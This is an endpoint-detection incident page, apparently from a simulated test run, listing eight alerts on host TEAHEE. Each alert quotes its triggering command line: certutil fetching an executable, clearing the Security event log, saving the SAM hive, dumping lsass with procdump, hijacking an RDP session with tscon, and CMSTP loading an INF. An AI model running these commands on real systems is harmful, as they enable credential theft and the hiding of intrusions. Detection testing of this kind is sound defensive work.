Back to list

Critical CINC-20251220-78688A16 new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8660232869

Incident Overview

Incident ID CINC-20251220-78688A16
Severity Critical (90)
Status new
Alert Count 8
Host Count 1

Timeline

First Seen 2025-12-18 10:57:39
Last Seen 2025-12-18 10:58:54
Duration 0d 0h 1m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Defense Evasion Command and Control Credential Access Lateral Movement Execution
Techniques:
CMSTP Ingress Tool Transfer Indicator Removal OS Credential Dumping Remote Desktop Protocol User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (8)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs andor COM scriptlets SCT from remote servers. Review the command line. Defense Evasion cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf 12-18 10:58
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\dokji\AppData\Local\Temp\cert_test.exe 12-18 10:58
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 10:58
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 10:58
High new TEAHEE A command line indicates an attempt to hijack a remote desktop protocol session. Review the process tree. Lateral Movement C:\WINDOWS\system32\cmd.exe /c "tscon 1 /dest:rdp-tcp#0" 12-18 10:58
High new TEAHEE An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" 12-18 10:58
High new TEAHEE An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" 12-18 10:58
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-18 10:57